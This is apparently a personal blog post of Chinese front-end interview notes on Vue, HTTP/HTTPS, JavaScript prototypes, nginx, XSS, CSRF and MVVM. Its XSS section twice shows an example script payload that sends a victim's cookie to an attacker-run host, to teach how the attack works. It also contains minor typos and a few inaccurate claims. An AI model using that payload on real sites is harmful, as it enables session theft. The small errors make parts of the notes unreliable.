<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="1.同源的定义：端口，协议，域名都一致。2.VUE的响应式原理：例如：Vue的一个实例对象a，其中有一个属性a.b，那么在实例化的过程中，通过Object.defineProperyu()会对a.b添加getter和setter，同时Vue.js会对模版进行编译，解析生成一个指令对象（这里是v-text指令），每个指令对象都会关联一个Watcher。当a.b求值的时候，就会触发它的getter，当">
<meta property="og:type" content="article">
<meta property="og:title" content="April">
<meta property="og:url" content="http://yoursite.com/2019/04/09/April/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="1.同源的定义：端口，协议，域名都一致。2.VUE的响应式原理：例如：Vue的一个实例对象a，其中有一个属性a.b，那么在实例化的过程中，通过Object.defineProperyu()会对a.b添加getter和setter，同时Vue.js会对模版进行编译，解析生成一个指令对象（这里是v-text指令），每个指令对象都会关联一个Watcher。当a.b求值的时候，就会触发它的getter，当">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/2019/04/09/img/kuayu.png">
<meta property="og:image" content="http://yoursite.com/2019/04/09/img/http.jpeg">
<meta property="og:image" content="http://yoursite.com/2019/04/09/img/csrf.png">
<meta property="og:image" content="http://yoursite.com/2019/04/09/img/TCP.JPG">
<meta property="og:image" content="http://yoursite.com/2019/04/09/img/socket.JPG">
<meta property="og:image" content="http://yoursite.com/2019/04/09/img/http1.x.jpg">
<meta property="og:image" content="http://yoursite.com/2019/04/09/img/http2.0.PNG">
<meta property="og:image" content="http://yoursite.com/2019/04/09/img/readystate.png">
<meta property="og:updated_time" content="2019-04-09T05:39:04.293Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="April">
<meta name="twitter:description" content="1.同源的定义：端口，协议，域名都一致。2.VUE的响应式原理：例如：Vue的一个实例对象a，其中有一个属性a.b，那么在实例化的过程中，通过Object.defineProperyu()会对a.b添加getter和setter，同时Vue.js会对模版进行编译，解析生成一个指令对象（这里是v-text指令），每个指令对象都会关联一个Watcher。当a.b求值的时候，就会触发它的getter，当">
<meta name="twitter:image" content="http://yoursite.com/2019/04/09/img/kuayu.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/04/09/April/">





  <title>April | Hexo</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/04/09/April/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">April</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-04-09T13:34:04+08:00">
                2019-04-09
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h4 id="1-同源的定义：端口，协议，域名都一致。"><a href="#1-同源的定义：端口，协议，域名都一致。" class="headerlink" title="1.同源的定义：端口，协议，域名都一致。"></a>1.同源的定义：端口，协议，域名都一致。<img src="../img/kuayu.png" alt="跨域"></h4><h4 id="2-VUE的响应式原理：例如：Vue的一个实例对象a，其中有一个属性a-b，那么在实例化的过程中，通过Object-defineProperyu-会对a-b添加getter和setter，同时Vue-js会对模版进行编译，解析生成一个指令对象（这里是v-text指令），每个指令对象都会关联一个Watcher。当a-b求值的时候，就会触发它的getter，当修改a-b的值的时候，就会触发它的setter，同时会通知被关联的Watcher，然后Wactcher就会再次对a-b求值，计算对比新旧值，当值改变了，Watcher就会通知到指令，调用指令的upadta-方法，由于指令是对DOM的封装，所以就会调用DOM的原生方法去更新视图，这样就完成了数据改变到视图更新的一个自动过程。"><a href="#2-VUE的响应式原理：例如：Vue的一个实例对象a，其中有一个属性a-b，那么在实例化的过程中，通过Object-defineProperyu-会对a-b添加getter和setter，同时Vue-js会对模版进行编译，解析生成一个指令对象（这里是v-text指令），每个指令对象都会关联一个Watcher。当a-b求值的时候，就会触发它的getter，当修改a-b的值的时候，就会触发它的setter，同时会通知被关联的Watcher，然后Wactcher就会再次对a-b求值，计算对比新旧值，当值改变了，Watcher就会通知到指令，调用指令的upadta-方法，由于指令是对DOM的封装，所以就会调用DOM的原生方法去更新视图，这样就完成了数据改变到视图更新的一个自动过程。" class="headerlink" title="2.VUE的响应式原理：例如：Vue的一个实例对象a，其中有一个属性a.b，那么在实例化的过程中，通过Object.defineProperyu()会对a.b添加getter和setter，同时Vue.js会对模版进行编译，解析生成一个指令对象（这里是v-text指令），每个指令对象都会关联一个Watcher。当a.b求值的时候，就会触发它的getter，当修改a.b的值的时候，就会触发它的setter，同时会通知被关联的Watcher，然后Wactcher就会再次对a.b求值，计算对比新旧值，当值改变了，Watcher就会通知到指令，调用指令的upadta()方法，由于指令是对DOM的封装，所以就会调用DOM的原生方法去更新视图，这样就完成了数据改变到视图更新的一个自动过程。"></a>2.VUE的响应式原理：例如：Vue的一个实例对象a，其中有一个属性a.b，那么在实例化的过程中，通过<code>Object.defineProperyu()</code>会对a.b添加<code>getter</code>和<code>setter</code>，同时Vue.js会对模版进行编译，解析生成一个指令对象（这里是<code>v-text</code>指令），每个指令对象都会关联一个Watcher。当a.b求值的时候，就会触发它的<code>getter</code>，当修改a.b的值的时候，就会触发它的<code>setter</code>，同时会通知被关联的<code>Watcher</code>，然后<code>Wactcher</code>就会再次对a.b求值，计算对比新旧值，当值改变了，<code>Watcher</code>就会通知到指令，调用指令的<code>upadta()</code>方法，由于指令是对<code>DOM</code>的封装，所以就会调用DOM的原生方法去更新视图，这样就完成了数据改变到视图更新的一个自动过程。</h4><h4 id="3-计算属性-Vue生命周期：看官方文档或者“https-blog-csdn-net-smartdt-article-details-75557369”"><a href="#3-计算属性-Vue生命周期：看官方文档或者“https-blog-csdn-net-smartdt-article-details-75557369”" class="headerlink" title="3.计算属性+Vue生命周期：看官方文档或者“https://blog.csdn.net/smartdt/article/details/75557369”"></a>3.计算属性+Vue生命周期：看官方文档或者“<a href="https://blog.csdn.net/smartdt/article/details/75557369”" target="_blank" rel="noopener">https://blog.csdn.net/smartdt/article/details/75557369”</a></h4><h4 id="4-关于http可以看自己的hexo博客-http简单来说是一个应用层协议，http默认端口是80；"><a href="#4-关于http可以看自己的hexo博客-http简单来说是一个应用层协议，http默认端口是80；" class="headerlink" title="4.关于http可以看自己的hexo博客/http简单来说是一个应用层协议，http默认端口是80；"></a>4.关于http可以看自己的hexo博客/http简单来说是一个应用层协议，http默认端口是80；</h4><h4 id="5-https：通俗来说，https就是http的加密，并且其采用对称加密方法：这是一种最快速，最简单的一种加密方法，采用单钥密码系统的加密方法，同一个密钥可以同时用作信息的加密和解密，对称加密是用一个密钥来解密的。（具体看第六点）"><a href="#5-https：通俗来说，https就是http的加密，并且其采用对称加密方法：这是一种最快速，最简单的一种加密方法，采用单钥密码系统的加密方法，同一个密钥可以同时用作信息的加密和解密，对称加密是用一个密钥来解密的。（具体看第六点）" class="headerlink" title="5.https：通俗来说，https就是http的加密，并且其采用对称加密方法：这是一种最快速，最简单的一种加密方法，采用单钥密码系统的加密方法，同一个密钥可以同时用作信息的加密和解密，对称加密是用一个密钥来解密的。（具体看第六点）"></a>5.https：通俗来说，https就是http的加密，并且其采用对称加密方法：这是一种最快速，最简单的一种加密方法，采用单钥密码系统的加密方法，同一个密钥可以同时用作信息的加密和解密，对称加密是用一个密钥来解密的。（具体看第六点）</h4><h4 id="6-SSL协议：SSL是保证服务器和客户端安全通信的一种协议，简单来说，就是对传输信息进行加密保证安全的协议。HTTP报文通过SSL的加解密变成了安全的https。然后来看看证书：证书可以简单看成网站在网络中的身份证，每次访问某个网站的时候，其实我们都会检查它的身份证是否可靠。证书除了验证身份可靠外，还参与了SSL会话建立的过程。"><a href="#6-SSL协议：SSL是保证服务器和客户端安全通信的一种协议，简单来说，就是对传输信息进行加密保证安全的协议。HTTP报文通过SSL的加解密变成了安全的https。然后来看看证书：证书可以简单看成网站在网络中的身份证，每次访问某个网站的时候，其实我们都会检查它的身份证是否可靠。证书除了验证身份可靠外，还参与了SSL会话建立的过程。" class="headerlink" title="6.SSL协议：SSL是保证服务器和客户端安全通信的一种协议，简单来说，就是对传输信息进行加密保证安全的协议。HTTP报文通过SSL的加解密变成了安全的https。然后来看看证书：证书可以简单看成网站在网络中的身份证，每次访问某个网站的时候，其实我们都会检查它的身份证是否可靠。证书除了验证身份可靠外，还参与了SSL会话建立的过程。"></a>6.SSL协议：<code>SSL</code>是保证服务器和客户端安全通信的一种协议，简单来说，就是对传输信息进行加密保证安全的协议。HTTP报文通过SSL的加解密变成了安全的https。然后来看看<code>证书</code>：证书可以简单看成网站在网络中的身份证，每次访问某个网站的时候，其实我们都会检查它的身份证是否可靠。证书除了验证身份可靠外，还参与了SSL会话建立的过程。</h4><blockquote>
<p>因为加密方式存在对称加密和非对称加密的两种方式，可是使用对称总不能把密钥明文发过去服务端，使用非对称加密的效率低。所以这时就出现了ssl：首先使用非对称加密的方式把对称加密的密钥传给对方，然后都知道对称密钥的客户端和服务端再采取对称加密进行通讯。即使截取到了也是加了密的密钥。这就是ssl的原理。</p>
</blockquote>
<h4 id="7-gulp：”https-www-gulpjs-com-cn-quot"><a href="#7-gulp：”https-www-gulpjs-com-cn-quot" class="headerlink" title="7.gulp：”https://www.gulpjs.com.cn/&quot;"></a>7.gulp：”<a href="https://www.gulpjs.com.cn/&quot;" target="_blank" rel="noopener">https://www.gulpjs.com.cn/&quot;</a></h4><h4 id="8-new-new关键字做了5件事情："><a href="#8-new-new关键字做了5件事情：" class="headerlink" title="8.new:new关键字做了5件事情："></a>8.new:new关键字做了5件事情：</h4><blockquote>
<p>1.创建Object<br>2.查找class的prototype上的所有方法、属性，复制一份给创建的Object，如果prototype上有属性是function或者数组或者Object，那么只复制指针。<br>3.将构造函数classA内部的this指向创建的Object<br>4.创建的Object的<strong>proto</strong>指向class的prototype<br>5.执行构造函数class</p>
</blockquote>
<h4 id="9-原型："><a href="#9-原型：" class="headerlink" title="9.原型："></a>9.原型：</h4><blockquote>
<p>console.log(Object instanceof Function); //true<br>console.log(Function instanceof Object); //true<br>console.log(Function instanceof Function); //true<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Foo</span>(<span class="params"></span>)</span>&#123;&#125;</span><br><span class="line"><span class="keyword">var</span> f1 = <span class="keyword">new</span> Foo();</span><br><span class="line"></span><br><span class="line"><span class="built_in">console</span>.log(f1 <span class="keyword">instanceof</span> FOO)； <span class="comment">//true</span></span><br><span class="line"><span class="built_in">console</span>.log(f1 <span class="keyword">instanceof</span> <span class="built_in">Object</span>); <span class="comment">//true</span></span><br></pre></td></tr></table></figure></p>
</blockquote>
<h4 id="10-delete和Vue-delete删除数组的区别"><a href="#10-delete和Vue-delete删除数组的区别" class="headerlink" title="10.delete和Vue.delete删除数组的区别"></a>10.delete和Vue.delete删除数组的区别</h4><blockquote>
<p>delete只是被删除的元素变成了empty/undefined，其他的元素的键值还是不变。</p>
</blockquote>
<blockquote>
<p><code>Vue.delete</code>直接删掉了数组，改变了数组的键值。<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> a = [<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>];</span><br><span class="line"><span class="keyword">var</span> b = [<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>];</span><br><span class="line"><span class="keyword">delete</span> a[<span class="number">1</span>];</span><br><span class="line"><span class="built_in">console</span>.log(a);  </span><br><span class="line"><span class="keyword">this</span>.$<span class="keyword">delete</span>(b,<span class="number">1</span>);</span><br><span class="line"><span class="built_in">console</span>.log(b);</span><br></pre></td></tr></table></figure></p>
</blockquote>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">1</span>,empty,<span class="number">3</span>,<span class="number">4</span>] <span class="comment">//a</span></span><br><span class="line">[<span class="number">1</span>,<span class="number">3</span>,<span class="number">4</span>] <span class="comment">// b</span></span><br><span class="line"><span class="number">0</span>:<span class="number">1</span></span><br><span class="line"><span class="number">2</span>:<span class="number">3</span></span><br><span class="line"><span class="number">3</span>:<span class="number">4</span>    <span class="comment">//a</span></span><br><span class="line"><span class="number">0</span>:<span class="number">1</span></span><br><span class="line"><span class="number">1</span>:<span class="number">3</span></span><br><span class="line"><span class="number">2</span>:<span class="number">4</span>   <span class="comment">// b</span></span><br></pre></td></tr></table></figure>
<h4 id="11-其实深拷贝和浅拷贝都是针对的引用类型，JS中的变量类型分为值类型（基本类型）和引用类型；对值类型进行复制操作会对值进行一份拷贝，而对引用类型进行复制，则会进行地址的拷贝，最终两个变量指向同一份数据。深拷贝的话有可能导致爆栈（因为有用递归），破解方法：https-segmentfault-com-a-1190000016672263（md，现在真的看不懂，不开玩笑，还是看视频去了）"><a href="#11-其实深拷贝和浅拷贝都是针对的引用类型，JS中的变量类型分为值类型（基本类型）和引用类型；对值类型进行复制操作会对值进行一份拷贝，而对引用类型进行复制，则会进行地址的拷贝，最终两个变量指向同一份数据。深拷贝的话有可能导致爆栈（因为有用递归），破解方法：https-segmentfault-com-a-1190000016672263（md，现在真的看不懂，不开玩笑，还是看视频去了）" class="headerlink" title="11.其实深拷贝和浅拷贝都是针对的引用类型，JS中的变量类型分为值类型（基本类型）和引用类型；对值类型进行复制操作会对值进行一份拷贝，而对引用类型进行复制，则会进行地址的拷贝，最终两个变量指向同一份数据。深拷贝的话有可能导致爆栈（因为有用递归），破解方法：https://segmentfault.com/a/1190000016672263（md，现在真的看不懂，不开玩笑，还是看视频去了）"></a>11.其实深拷贝和浅拷贝都是针对的引用类型，JS中的变量类型分为值类型（基本类型）和引用类型；对值类型进行复制操作会对值进行一份拷贝，而对引用类型进行复制，则会进行地址的拷贝，最终两个变量指向同一份数据。深拷贝的话有可能导致爆栈（因为有用递归），破解方法：<a href="https://segmentfault.com/a/1190000016672263（md，现在真的看不懂，不开玩笑，还是看视频去了）" target="_blank" rel="noopener">https://segmentfault.com/a/1190000016672263（md，现在真的看不懂，不开玩笑，还是看视频去了）</a></h4><h4 id="12-nginx"><a href="#12-nginx" class="headerlink" title="12.nginx:"></a>12.nginx:</h4><blockquote>
<p>1⃣️什么是反向代理？<br>当我们有一个服务器集群，并且服务器集群中的每台服务器的内容一样的时候，同样我们要直接从个人电脑访问到服务器集群服务器的时候无法访问，必须通过第三方服务器才能访问集群。<br>这个时候，我们通过第三方服务器访问服务器集群的内容，但是我们并不知道是哪一台服务器提供的内容，此种代理方式称为反向代理  </p>
</blockquote>
<blockquote>
<p>2⃣️什么是负载均衡<br>公司会建立很多的服务器，这些服务器组成了服务器集群，然后，当用户访问网站的时候，先访问一个中间服务器，再让这个中间服务器在服务器集群中选择一个压力较小的服务器，然后将该访问请求引入选择的服务器<br>所以，用户每次访问，都会保证服务器集群中的每个服务器压力趋于平衡，分担了服务器的压力，避免了服务器崩溃的情况。<br>一句话：nginx会给你分配服务器压力小的去访问  看看⬇️<br><a href="https://mp.weixin.qq.com/s/FRVE8u5NdAtbHJrvagdfcQ" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/FRVE8u5NdAtbHJrvagdfcQ</a>  </p>
</blockquote>
<h4 id="13-http状态码"><a href="#13-http状态码" class="headerlink" title="13.http状态码"></a>13.http状态码</h4><p><img src="../img/http.jpeg" alt="http状态码"></p>
<h4 id="14-vertical-align-”inline-block依赖性元素”，只有一个元素属于inline或者是inline-block-table-cell也可以理解为inline-block水平-水平，其身上的vertical-align属性才可以起作用。"><a href="#14-vertical-align-”inline-block依赖性元素”，只有一个元素属于inline或者是inline-block-table-cell也可以理解为inline-block水平-水平，其身上的vertical-align属性才可以起作用。" class="headerlink" title="14.vertical-align:”inline-block依赖性元素”，只有一个元素属于inline或者是inline-block(table-cell也可以理解为inline-block水平)水平，其身上的vertical-align属性才可以起作用。"></a>14.vertical-align:”inline-block依赖性元素”，只有一个元素属于inline或者是inline-block(table-cell也可以理解为inline-block水平)水平，其身上的vertical-align属性才可以起作用。</h4><h4 id="15-前端的安全性：XSS和CSRF"><a href="#15-前端的安全性：XSS和CSRF" class="headerlink" title="15.前端的安全性：XSS和CSRF"></a>15.前端的安全性：XSS和CSRF</h4><blockquote>
<p><code>XSS</code>又称CSS。。。。。。。，中文名叫跨站脚本攻击，XSS属于被动式且用于客户端的攻击方式。其原理：攻击者向有XSS漏洞的网站中输入（传入）恶意的HTML代码，当其他用户访问该网站时，这段HTML代码会自动执行，从而达到攻击的目的。如：盗取用户的cookie、破坏页面结构、重定向到其他网站等。<code>XSS</code>攻击类似于SQL注入攻击，攻击前，先找到一个存在XSS漏洞的网站，XSS漏洞分为两种，一种是<code>DOM Based XSS</code>漏洞，另一种是<code>Stored XSS</code>漏洞。理论上，<b>所有可以输入的地方</b>没有对输入数据进行处理的话，都会存在XSS漏洞，漏洞的危害取决于攻击代码的威力，攻击代码也不局限与script。  </p>
</blockquote>
<p>1.<b>DOM Based XSS</b>  </p>
<blockquote>
<p>这是一种基于网页DOM结构的攻击，该攻击的特点是中招的人是少数人。<b>比如:</b>我给A发一个邮件，邮件里面有一个超链接：<a href="http://www.a.com?content=" target="_blank" rel="noopener">http://www.a.com?content=</a><script>window.onload(‘<a href="http://www.b.com?param=+document.cookie&#39;">www.b.com?param=+document.cookie&#39;</a>)</script>(md禁了script的内容。。)，（假设知道a.com网站的内容是通过content参数直接显示的）当A点击这个链接（假设A已经登陆了a.com），浏览器会直接打开b.com，并且把A在a.com的cookie发给b.com，b.com是我自己搭的，当我的网站接收到该信息的时候，我就已经盗取了A在a.com的cookie了，攻击成功！这个过程中，受害者只有A自己。  </p>
</blockquote>
<p>2.<b>Stored XSS</b></p>
<blockquote>
<p>这是一个存储式XSS漏洞，由于其攻击代码已经存储到服务器上或者数据库中，所以受害者是很多人。<b>例如:</b>a.com可以发表文章，我登陆了a.com中发布了一篇文章，文章中包含了恶意代码，<script>window.onload(‘<a href="http://www.b.com?param=+document.cookie&#39;">www.b.com?param=+document.cookie&#39;</a>)</script>，保存文章。这时候A和B看到了我发布的文章，当在查看我的文章的时候就都中招了，他们的cookie信息就发送到了我的服务器上，攻击成功。这个过程中，受害者是多人的。还有另一个例子就是，我登陆时候输入了恶意代码，代码被保存到后端数据库里面，然后超级管理员点击我的信息的时候也可以窃取到超级管理员的信息。<b>Stored XSS漏洞危害性更大，危害面更广。</b>  </p>
</blockquote>
<p>3.如何防御？<br>一句话：<b>永远不相信用户的输入，需要对用户的输入进行处理，只允许输入合法的值，其他值一概过滤掉。</b></p>
<h4 id="16-CSRF-跨站请求伪造-XSRF"><a href="#16-CSRF-跨站请求伪造-XSRF" class="headerlink" title="16.CSRF(跨站请求伪造/XSRF)"></a>16.CSRF(跨站请求伪造/XSRF)</h4><p><b>1</b>.  </p>
<blockquote>
<p>如何理解CSRF攻击？<font color="red">攻击者盗用了你的身份，以你的名义发送恶意请求</font><br>原理：<img src="../img/csrf.png" alt="csrf">从图可以看出，要完成一次csrf攻击，受害者必须<font color="red">依次完成两个步骤</font>：<br><b>1.登陆受信任网站A，并在本地生成Cookie<br>2.在不登出A点情况下，访问危险网站B。</b><br>你也许会说：“<b>如果我不满足以上两个条件的一个，我就不会受到CSRF的攻击</b>“,是的，确实如此，但你不能保证以下情况不会发生：<br>1.你不能保证你登录了一个网站后，不再打开一个tab页面并访问另外的网站.<br>2.你不能保证你关闭了浏览器后，你本地的cookie立即过期，你上次的会话已经结束。(事实上，关闭浏览器不能结束一个会话)<br>3.上图中所谓的攻击网站，可能是一个存在其他漏洞的可信任的经常被人访问的网站。  </p>
</blockquote>
<p><b><font color="red">CSRF攻击源于WEB的隐式身份验证机制！WEB的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器，但却无法保证该请求是用户批准发送的</font></b><br><b>2.如何防御？</b>  </p>
<ol><br>  <li>CSRF的防御可以从服务端和客户端两方面着手，防御效果是从服务端着手效果比较好，现在一般的CSRF防御也都在服务端进行.</li><br>  <li>服务端的CSRF方式方法很多样，但总的思想都是一致的，就是在客户端页面增加伪随机数</li><br></ol>  

<h4 id="17-TCP三次握手与四次挥手"><a href="#17-TCP三次握手与四次挥手" class="headerlink" title="17 TCP三次握手与四次挥手"></a>17 TCP三次握手与四次挥手</h4><p><img src="../img/TCP.JPG" alt="TCP">  </p>
<h4 id="18-Socket"><a href="#18-Socket" class="headerlink" title="18 Socket"></a>18 Socket</h4><p><img src="../img/socket.JPG" alt="socket"></p>
<h4 id="19-HTTP1-0与1-1的区别"><a href="#19-HTTP1-0与1-1的区别" class="headerlink" title="19 HTTP1.0与1.1的区别"></a>19 HTTP1.0与1.1的区别</h4><p><img src="../img/http1.x.jpg" alt="http1.x"></p>
<h4 id="20-HTTP1-x与2-0的区别"><a href="#20-HTTP1-x与2-0的区别" class="headerlink" title="20 HTTP1.x与2.0的区别"></a>20 HTTP1.x与2.0的区别</h4><p><img src="../img/http2.0.PNG" alt="http2.0"></p>
<h4 id="21-更多网络知识尽在："><a href="#21-更多网络知识尽在：" class="headerlink" title="21 更多网络知识尽在："></a>21 更多网络知识尽在：</h4><blockquote>
<p><a href="https://mp.weixin.qq.com/s/uF3bJrjGbGCAzCuCWk18BA" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/uF3bJrjGbGCAzCuCWk18BA</a>  </p>
</blockquote>
<h4 id="22-PWA-CGO面试有-："><a href="#22-PWA-CGO面试有-：" class="headerlink" title="22.PWA(CGO面试有)："></a>22.PWA(CGO面试有)：</h4><p>1.What is PWA?<br>:PWA全称渐进式网络应用，是一种可以提供类似于原生应用程序(native app)体验的网络应用程序(web app)。PWA 可以用来做很多事。其中最重要的是，在离线(offline)时应用程序能够继续运行功能。这是通过使用名为 Service Workers 的网络技术来实现的。  </p>
<h5 id="大致就上面那些，了解一下，更多的话看：https-blog-csdn-net-weixin-33716154-article-details-88177463"><a href="#大致就上面那些，了解一下，更多的话看：https-blog-csdn-net-weixin-33716154-article-details-88177463" class="headerlink" title="大致就上面那些，了解一下，更多的话看：https://blog.csdn.net/weixin_33716154/article/details/88177463"></a>大致就上面那些，了解一下，更多的话看：<a href="https://blog.csdn.net/weixin_33716154/article/details/88177463" target="_blank" rel="noopener">https://blog.csdn.net/weixin_33716154/article/details/88177463</a></h5><h4 id="23-MVC由Model，View，Controller-Controller是MVC体系架构的核心部分-三部分组成。Controller中包含后台代码逻辑，View是ASPX，如纯HTML代码，Model是中间层。MVC的改变有两点，View变成简单的HTML，后台代码移到-NET类中，称为控制器-以下是ASP-NET-MVC请求流通用步骤-Model和Controller相连，View跟Controller相连"><a href="#23-MVC由Model，View，Controller-Controller是MVC体系架构的核心部分-三部分组成。Controller中包含后台代码逻辑，View是ASPX，如纯HTML代码，Model是中间层。MVC的改变有两点，View变成简单的HTML，后台代码移到-NET类中，称为控制器-以下是ASP-NET-MVC请求流通用步骤-Model和Controller相连，View跟Controller相连" class="headerlink" title="23.MVC由Model，View，Controller(Controller是MVC体系架构的核心部分)三部分组成。Controller中包含后台代码逻辑，View是ASPX，如纯HTML代码，Model是中间层。MVC的改变有两点，View变成简单的HTML，后台代码移到.NET类中，称为控制器.以下是ASP.NET MVC请求流通用步骤(Model和Controller相连，View跟Controller相连)"></a>23.MVC由Model，View，Controller<font color="red">(Controller是MVC体系架构的核心部分)</font>三部分组成。Controller中包含后台代码逻辑，View是ASPX，如纯HTML代码，Model是中间层。MVC的改变有两点，View变成简单的HTML，后台代码移到.NET类中，称为控制器.以下是<code>ASP.NET MVC</code>请求流通用步骤(Model和Controller相连，View跟Controller相连)</h4><p><b><br>  <ol><br>    <li>首先获取控制器<br>    </li><li>依赖行为控制器创建Model对象，Model通过转换调用数据访问层<br>    </li><li>数据填充Model层后，传递到View显示层，实现显示的目的。<br>  </li></ol><br></b></p>
<h5 id="看到MVC不得不提一下VUE中的的MVVM："><a href="#看到MVC不得不提一下VUE中的的MVVM：" class="headerlink" title="看到MVC不得不提一下VUE中的的MVVM："></a>看到MVC不得不提一下VUE中的的MVVM：</h5><ol><br>  <li>MVVM是什么？<br>  ：MVVM：M：Model，V：View，VM：ViewModel,类似于MVC的</li><br>  <ul><br>    <li>Model:代表数据模型，数据和业务逻辑都在Model层中定义；<br>    </li><li>View:代表UI视图，负责数据的展示；<br>    </li><li>ViewModel:负责监听Model层中的数据的改变并且控制视图的更新，处理用户的交互操作。<br>  </li></ul><br>  <li>Model和View并无直接关联，而是通过ViewModel来进行联系的，Model和ViewModel之间有着双向数据绑定的联系。因此，当Model中的数据中发生改变的时候会触发View层中的刷新，View中由于用户交互操作而改变的数据也会在Model中同步。<br>  </li><li>这种模式实现来Model和View的数据自动同步，因此开发者只需要专注对数据的维护即可，而不需要自己操作dom。<br><br>#### 24 XMLHttpRequest<br><img src="../img/readystate.png" alt="事件"><br><br>#### 25单页面应用(SPA)<br>&gt;只有一张Web页面的应用，是加载单个HTML页面并在用户与应用程序交互时动态更新该页面的Web应用程序，是指在浏览器中运行的应用，它们在使用期间不会重新加载页面。<br>&gt;速度：更好的用户体验，让用户在web app感受native app的速度和流畅，<br>MVC：经典MVC开发模式，前后端各负其责。<br>ajax：重前端，业务逻辑全部在本地操作，数据都需要通过AJAX同步、提交。<br>路由：在URL中采用#号来作为当前视图的地址,改变#号后的参数，页面并不会重载。<br>&gt;<b>单页Web应用，顾名思义，就是只有一张Web页面的应用。浏览器一开始会加载必需的HTML、CSS和JavaScript，之后所有的操作都在这张页面上完成，这一切都由JavaScript来控制。因此，单页Web应用会包含大量的JavaScript代码，复杂度可想而知，模块化开发和设计的重要性不言而喻。</b><br><br>#### 